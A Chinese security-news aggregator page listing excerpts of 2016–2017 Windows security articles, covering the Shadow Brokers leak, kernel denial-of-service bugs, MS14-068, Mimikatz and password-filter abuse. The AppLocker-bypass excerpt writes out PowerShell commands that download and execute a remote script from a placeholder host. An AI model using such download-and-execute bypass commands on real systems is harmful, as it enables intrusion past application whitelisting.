记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

ShadowBroker是这样放大招的:Windows零日利用工具更多数据呈现

北京时间2017年4月14日,Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个 Windows 远程漏洞利用工具,可以覆盖全球 70% 的 Windows 服务器,影响程度非常巨大。除Microsoft Windows以外,受影响的产品还有: IBM Lotus Notes,Mdaemon, EPICHERO Avaya Call Server,Imail。 事件时间轴 1.在2016 年 8 月有一个 “Shadow Brokers” 的黑客组织号称入侵了方程式组织窃取了大量机密文件,并将部分文件公开到了互联网上,方程式(Equation Group)据称是 NSA(美国国家安全局)下属的黑客组织,有着极高的技术手段。这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外 “Shad
发布时间:2017-04-16 03:15 | 阅读:190452 | 评论:0 | 标签:系统安全 Exploit NSA ShadowBrokers windows

我是如何获取全域用户明文密码的?

* 本文原创作者:c0debreak,本文属FreeBuf原创奖励计划,未经许可禁止转载 简介 在组策略之外,Windows 允许你自定义密码策略,滥用这个机制可以实现一些恶意行为。今天为大家科普下 当我们按下 CTRL + ALT + DEL,修改用户密码时,在 Windows 服务器端,会发生什么呢? 首先,Windows 服务器(域控)会检查注册表,找到 Password Filter,也就是 LSA Notification Package。然后挨个调用DLL,检查密码是否符合策略, 如果不符合策略,就提示密码不够健壮, 在默认情况下,域上的服务器包含两个DLL,其中 seccli 负责实现密码安全策略,也就我们常用的GPO了 我们今天的主题,就是如何滥用这个机制,实现一个密码策略插件,以
发布时间:2017-03-21 19:30 | 阅读:183886 | 评论:0 | 标签:系统安全 windows

微软 Windows 10 也要防ATP了

微软预览其企业威胁防护产品部分新功能,拟在 Windows 10 Builder更新中推出。 Windows 10 Builder更新中会有更多针对创意专业人士的虚拟现实体验和功能。对公司而言,该系统软件升级也将增强 Windows Defender 高级威胁防护(ATP)发现隐藏攻击的能力。 虽然借用了该公司旗舰操作系统捆绑反恶意软件产品的名头,Windows Defender ATP 却是个云数据安全服务,依托微软大规模威胁情报系统收集到的信息,提供高级数据泄露防护。因为是重大升级,将在今年春天放出。 微软 Windows Defender ATP 首席项目经理阿维·撒基辅称:“Windows创建者更新改善了OS内存和内核传感器,可以检测利用内存和内核级攻击的攻击者,照亮了之前攻击者躲避传统检测工具的黑暗
发布时间:2017-03-17 23:10 | 阅读:120140 | 评论:0 | 标签:牛闻牛评 ATP Windows

Windows内核本地拒绝服务#1(Windows 7-10)

早在2013年,Gynvael和我发布了我们的研究结果,在操作系统内核中发现so-called double fetch漏洞,通过在一个被称为Bochs的IA-32仿真器中运行它们。仿真器(以及我们的定制嵌入式仪器)的目是捕获关于对源自内核的用户模式存储器访问的详细信息,以便我们以后可以运行分析工具,在一个系统调用范围内发现多个对单个内存地址的引用,并产生有意义的报告。我们称这个项目为Bochspwn (使用Github上的kfetch工具包测试内存引用),并且大部分成功,导致在Windows内核中发现了几十个严重的漏洞。我们相信它对于普及double-fetch漏洞类和使用全系统仪器的安全概念起到了重要作用。 在经历了这一切后,我决定回到整系统检测的主题,分析各种执行轨迹,寻找潜在的漏洞。具体来说,我的目标之
发布时间:2017-03-10 04:30 | 阅读:154742 | 评论:0 | 标签:终端安全 win10 win32k!NtUserThunkedMenuItemInf win7 windows 内核

Windows内核本地拒绝服务#2(Windows 8-10)

这个星期,我们使用另一种未处理的异常ring-0代码方式使Windows内核本地崩溃(如果你不太懂,可以看上周的DoS在win32k!NtUserThunkedMenuItemInfo)。今天,这个bug是在win32k!NtDCompositionBeginFrame系统调用处理程序中的,其开始可以转换为以下类似C的伪代码: 由于我不知道I/O结构的名字和定义,我统称他们为INPUT_STRUCTURE和OUTPUT_STRUCTURE。在这里,我们可以看到第二个参数(lpInput)被访问了两次:第一次在第9行,对内联ProbeForRead调用和一个try/except块进行适当清理,第二次在23行,其中字段偏移0x10(在上面的列表中),SomeField是从用户指针读取的,而异常处理被禁用。该Tem
发布时间:2017-03-10 04:30 | 阅读:165693 | 评论:0 | 标签:终端安全 win10 win32k!NtDCompositionBeginFrame win8 windows 内核

Windows内核本地拒绝服务#3(Windows 7-8)

  这是这个系列中关于未修补的本地Windows内核拒绝服务错误的第三篇文章。截至目前为止,以前发布的帖子如下: Windows内核本地拒绝服务#2:win32k!NtDCompositionBeginFrame(Windows 8-10) Windows内核本地拒绝服务#1:win32k!NtUserThunkedMenuItemInfo(Windows 7-10) 与以前讨论的两个问题相反,今天的bug不是在图形子系统(win32k.sys),而是在核心内核模块:ntoskrnl.exe,更具体地是在nt!NtDuplicateToken系统调用的处理程序里(同名) 。根据MSDN,系统调用的定义如下: 我们这次所讨论的漏洞是由对用户参数传递控制指针的无保护访问引起的ObjectAttrib
发布时间:2017-03-10 04:30 | 阅读:161228 | 评论:0 | 标签:终端安全 nt!NtDuplicateToken win7 win8 windows 内核 本地拒绝服务 蓝屏

MS14-068域权限提升漏洞总结

0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票。银票是一张tgs,也就是一张服务票据。服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器。所以ms14-068的来源和银票是息息相关的。 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780。在server 2000以上的域控中,只要没有打这个补丁,那么情况将是非常糟糕的。 https://technet.microsoft.com/library/security/ms14-068.aspx 0x02 漏洞利用 2.1 windows
发布时间:2017-02-10 04:25 | 阅读:195276 | 评论:0 | 标签:内网渗透 Kali mimikatz MS14-068 ms14-068.py psexec pykek windows

小技巧:如何发现是否有人用USB偷插你的电脑?

你或许不会知道,咱们其实可以用windows注册表来检测是否曾经有一个特殊的USB设备连接过你的电脑。 验证USB设备的插入的重要性 大家可能不会相信,也许有一天咱们真会用上这个小技巧。比如你朋友的移动硬盘里被警察从你这里搜了出来,但是里面装满了儿童岛国动作片。这时候,证明这玩意儿不是你的就显得非常重要了。 我们想要检查某一台USB设备是否插入过自己的电脑,可以采用操作windows注册表的方式。因为每当有设备连接到你电脑的USB接口时,系统会将设备序列号和相应的信息储存在注册表中。 windows注册表验证USB设备的插入 下面我们将演示下如何找到设备的信息: 1. 同时按下WIN+R键,也就是打开“运行”。 2. 输入regedit,按下回车。 3. 转到HKEY_LOCAL_MACHINESYS
发布时间:2016-12-09 16:20 | 阅读:136768 | 评论:0 | 标签:数据安全 系统安全 USB windows 注册表

SyScan360国际前瞻信息安全会议24日场

前言 11月24日,2016SyScan360国际前瞻信息安全会议在上海正式拉开序幕。来自中国、美国、英国、巴西、德国等多个国家的互联网安全专家与顶级黑客参加。其中,21位互联网安全专家与顶级黑客就目前安全圈最受关注的金融安全防御、智能硬件破解、人工智能挖掘漏洞等16个议题发表主题演讲。 会议日程 11月24日会议日程 现场 会议签到处 美女主持人开场 嗯…给大家来张稍微高清点的 360企业安全副总裁韩笑发表讲话 韩笑指出,安全一直是备受关注的话题,而与其他智能安全相比,汽车安全问题更加急迫需要解决,汽车已经变成名副其实的智能终端设备,一旦出现安全问题,就可能车毁人亡。 为此,韩笑在大会宣布,360成立全国首个车联网安全中心。车联网安全中心将为汽车安全提供全方位的解决方案,包括推出汽车安
发布时间:2016-11-25 05:45 | 阅读:148852 | 评论:0 | 标签:独家 2016 syscan360 edge MAC OS攻击 SyScan360 windows 人工智能 国际前瞻信

AppLocker Bypass Techniques

from:https://www.youtube.com/watch?v=z04NXAkhI4k 0x00 Command 和 Powershell 没被禁用,脚本被禁用 1、直接使用cmd powershell执行 Powershell: IEX (New-Object Net.WebClient).DownloadString('http://ip:port/') Command: powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/') 2、管道 Powershell:Get-Content script.ps1 | iexCommand:cmd.exe /K &
发布时间:2016-09-20 21:35 | 阅读:143537 | 评论:0 | 标签:系统安全 applocker bypass powershell windows

BlackHat议题解析:Windows程序的数字签名校验“漏洞”

* 本文原创作者:维一零,本文属FreeBuf原创奖励计划,未经许可禁止转载在今年的黑帽大会上,国外的一个安全研究员展示了如何通过Windows的数字签名bypass对恶意程序代码的检测。下载大会的该演讲的ppt大概看了一下,报告分为两部分,第一部分展示数字签名的的校验“漏洞”,第二部分展示该作者自己研究实现的一个pe程序加载器,用来配合第一部分的“漏洞“bypass杀毒软件对恶意程序的检测。本文重点在于第一部分的这个数字签名校验”漏洞“,通过回顾分析数字签名的校验来阐述这个”漏洞“的原理。数字签名与数字证书讲这个”漏洞“之前先讲一下数字签名的原理,理解一般的数字签名验证过程。下面是数字签名的相关概念和验证过程:数字签名:对一段数据摘要使用私钥进行加密,公钥进行解密校验数字证书:对数字签名
发布时间:2016-09-05 15:30 | 阅读:87778 | 评论:0 | 标签:漏洞 blackhat windows 数字签名

Bypass UAC的一个实例分析

* 本文原创作者:zzz66686,本文属FreeBuf原创奖励计划,未经许可禁止转载1. 引言关于Bypass UAC这个主题,早已有了很多很成熟的方法,但普遍是以demo的形式出现,让大家参考学习的。在本文中,笔者拿出一个运用bypassUAC技术的病毒实例Cerber进行分析,通过逆向分析该实例让各位读者能够对bypass UAC的完整执行过程有一个正确的认识。Cerber是一款著名的勒索软件,如果对勒索软件有过一些研究,那一定听说过这款勒索软件。此外,本文可以作为www.freebuf.com/sectool/95661.html 的补充,该文只提到了一个工具的使用,而本文则深入讨论了Cerber中用到的Bypass UAC的技术细节。2. 整体概述Cerber勒索软件有
发布时间:2016-09-03 16:35 | 阅读:132027 | 评论:0 | 标签:系统安全 Cerber UAC windows

解锁Windows安全启动保护的金钥匙

微软刚刚放出大招,教育大众明白:想在安全系统里安置后门是行不通的。但两位安全研究员转身就在博客中发文表示:恶意Actor可以绕过Windows安全启动功能。 一旦被利用,该漏洞可使攻击者在目标机器上加载所有类型的软件,从bootkits和rootkit到完整的另一套操作系统。研究人员称,他们首次通告微软该问题,是在今年3月到4月间。 安全启动是 Windows 8 统一可扩展固件接口 (UEFI)的一项功能。它能确保引导阶段加载到PC上的组件是可信的。安全启动的重点,就在于防止流氓软件加载到机器上。 然而,不幸的是,微软给安全启动开了个某种意义上的后门。它设置了一个策略,可以让开发者绕过常规注册表检查就加载软件。这么一个策略,或者说管制安全启动运作方式的规则,它的产生理由确实够实诚。微软希望不用进行全部常规检
发布时间:2016-08-21 01:05 | 阅读:76497 | 评论:0 | 标签:威胁情报 Windows 安全启动 漏洞

如何防止Mimikatz「获取」Windows密码

黑客总是在用最简单的攻击方式来实现他们的目的,比如用已经存在了好多年的工具——Mimikatz(猕猴桃),它可以从系统内存中轻松获取到明文密码。受影响的系统Windows 7和Windows Server 2008(老系统也受影响)。最新的Windows 8 / 10 、Windows Server 2012 / 2016原本是不受影响的,但是高权限的黑客可以通过修改注册表来实现这样的攻击。风险黑客拥有系统管理员权限,就能从内存中获取登录认证信息(明文/各种哈希格式)。描述在Windows XP中,Microsoft增加了对“WDigest”协议的支持。该协议基于RFC 2617和2831。客户端用该协议向HTTP和SASL应用发送明文凭证,Windows会将密码缓存在内存中,便于用户登录
发布时间:2016-06-27 19:20 | 阅读:119885 | 评论:0 | 标签:漏洞 系统安全 Mimikatz WDigest windows 内存 服务器

BadTunnel:影响Win95到Win10的“超级漏洞”(CVE-2016-3213)

昨日,微软发布了一个高危漏洞的补丁,该漏洞由腾讯玄武实验室创建者于旸(中国安全圈人称TK教主)发现,并将其命名为“BadTunnel”,是目前Windows历史上影响最广泛的漏洞,从Win95到Win10都受影响。尤其对于微软已不支持的版本(如Win XP),其用户将面临被秘密监控的危险。因此,微软的漏洞奖励计划为其授予50000美金的奖金。于旸称,该漏洞为原始设计问题。当用户打开一个 URL,或者打开任意一种 Office 文件、PDF文件或者某些其他格式的文件,或者插上一个 U 盘——甚至不需要用户打开 U 盘里的任何东西,攻击者都可以完成利用,其成功率极高。最终的结果是,攻击者可以劫持整个目标网络,获取权限提升。“即使安全软件开启了主动防御机制,仍然无法检测到攻击。攻击者还可以利用该
发布时间:2016-06-15 16:00 | 阅读:97407 | 评论:0 | 标签:漏洞 BadTunnel CVE-2016-3213 windows

GNURadio For Windows编译安装脚本v1.1.1发布

GNURadio也能在Windows上运行了,安装GNURadio时,会自动化下载一系列powershell脚本,在源里进行build。然后它依赖为64位原生二进制文件,使用Visual Studio 2015打包成.msi。如果你想要了解更详细的内容,请看这里。MSI包里面包括:设备支持:UHD、RTL-SDR、hackrf、airspy、BladeRF、osmoSDR、FCDGNURadio模块:3.7.9.2版本除了gr-comedi都进行了build。OOT模块:gr-iqbal、gr-fosphor、gr-osmosdr、gr-acars、gr-adsb、gr-modtool其他应用:gqrx前情提要下面的工具需要安装:MS Visual Studio 2015(Communit
发布时间:2016-05-18 11:55 | 阅读:80596 | 评论:0 | 标签:工具 GNURADIO powershell windows

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云